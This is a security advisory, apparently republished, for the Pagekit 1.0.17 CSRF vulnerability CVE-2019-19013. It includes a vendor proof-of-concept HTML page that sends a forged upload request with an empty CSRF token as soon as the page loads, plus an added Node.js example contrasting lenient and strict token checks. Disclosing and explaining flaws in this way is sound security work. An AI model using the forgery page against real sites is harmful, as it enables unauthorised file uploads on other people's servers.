Pagekit CSRF Vulnerability (CVE-2019-19013)

Release Date: 2019-11-21
Updated: 2019-11-26

Affected Systems:

Pagekit Pagekit 1.0.17

Description:

CVE (CAN) ID: CVE-2019-19013

Pagekit is a modular, lightweight content management system.

Pagekit 1.0.17 has a CSRF vulnerability in its implementation. By removing the token from the CSRF request, an attacker can exploit this vulnerability to upload arbitrary files.

<* Source: Vendor *>

Test method:


WARNING

The following procedure (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

The vendor () provides the following test method:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/localhost\/pagekit\/system\/finder\/upload", true);
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryJze564AoGkbRRRUz");
        xhr.setRequestHeader("Accept", "*\/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");
        xhr.withCredentials = true;
        var body = "------WebKitFormBoundaryJze564AoGkbRRRUz\r\n" +
          "Content-Disposition: form-data; name=\"files[]\"; filename=\"test.jpg\"\r\n" +
          "Content-Type: image/jpeg\r\n" +
          "\r\n" +
          "\r\n" +
          "------WebKitFormBoundaryJze564AoGkbRRRUz\r\n" +
          "Content-Disposition: form-data; name=\"path\"\r\n" +
          "\r\n" +
          "/\r\n" +
          "------WebKitFormBoundaryJze564AoGkbRRRUz\r\n" +
          "Content-Disposition: form-data; name=\"root\"\r\n" +
          "\r\n" +
          "storage\r\n" +
          "------WebKitFormBoundaryJze564AoGkbRRRUz\r\n" +
          // The "_csrf" field is sent with an empty value.
          "Content-Disposition: form-data; name=\"_csrf\"\r\n" +
          "\r\n" +
          "\r\n" +
          "------WebKitFormBoundaryJze564AoGkbRRRUz--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
      }
      submitRequest();
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

Recommendation:

Vendor patch:

Pagekit
-------
The vendor currently provides no patch or upgrade. Users of this software are advised to check the vendor's home page regularly for the latest version:

https://pagekit.com/

https://packetstormsecurity.com/files/155426/Pagekit-CMS-1.0.17-Cross-Site-Request-Forgery.html
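
A server-side view of the flaw this advisory describes, as an added example that is not Pagekit's code and not part of the original advisory: it parses a multipart body carrying the `path`, `root` and `_csrf` fields of the request above and contrasts a hypothetical lenient token check with a strict one. The boundary, session token and function names are constructed for illustration; how Pagekit itself validates the token is not shown on this page.

```javascript
// Added example, not Pagekit code. Names and sample values are constructed.
const nodeCrypto = require("node:crypto");

const BOUNDARY = "----ExampleBoundary";       // constructed sample boundary
const SESSION_TOKEN = "k3Jq9vT2mX7pLw4Zs8Rb"; // constructed session token

// Build a body with the same text fields as the request on this page.
function sampleBody(csrf) {
  const d = "--" + BOUNDARY + "\r\n";
  return d + 'Content-Disposition: form-data; name="path"\r\n\r\n/\r\n' +
    d + 'Content-Disposition: form-data; name="root"\r\n\r\nstorage\r\n' +
    d + 'Content-Disposition: form-data; name="_csrf"\r\n\r\n' + csrf + "\r\n" +
    "--" + BOUNDARY + "--\r\n";
}

// Extract text fields from a multipart/form-data body; file parts are skipped.
function parseFields(body, boundary) {
  const fields = Object.create(null);
  for (const part of body.split("--" + boundary)) {
    const sep = part.indexOf("\r\n\r\n");
    if (sep === -1) continue; // preamble or closing "--" marker
    const headers = part.slice(0, sep);
    const name = /;\s*name="([^"]*)"/.exec(headers);
    if (!name || /filename="/.test(headers)) continue;
    // Drop the CRLF that precedes the next boundary line.
    fields[name[1]] = part.slice(sep + 4).replace(/\r\n$/, "");
  }
  return fields;
}

// Hypothetical flawed pattern: validation only runs when a token was sent.
function lenientCheck(fields, sessionToken) {
  if (!fields._csrf) return true; // empty or absent token bypasses the check
  return fields._csrf === sessionToken;
}

// Strict check: an absent or empty token fails; comparison is constant-time.
function strictCheck(fields, sessionToken) {
  const sent = Buffer.from(String(fields._csrf || ""), "utf8");
  const expected = Buffer.from(sessionToken, "utf8");
  if (sent.length === 0 || sent.length !== expected.length) return false;
  return nodeCrypto.timingSafeEqual(sent, expected);
}

const emptyToken = parseFields(sampleBody(""), BOUNDARY);
console.log("lenient accepts empty token:", lenientCheck(emptyToken, SESSION_TOKEN));
console.log("strict accepts empty token: ", strictCheck(emptyToken, SESSION_TOKEN));
```

The strict check belongs on every state-changing route, including upload endpoints, and should run before any part of the request body is acted on.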

Origin www.linuxidc.com/Linux/2019-11/161573.htm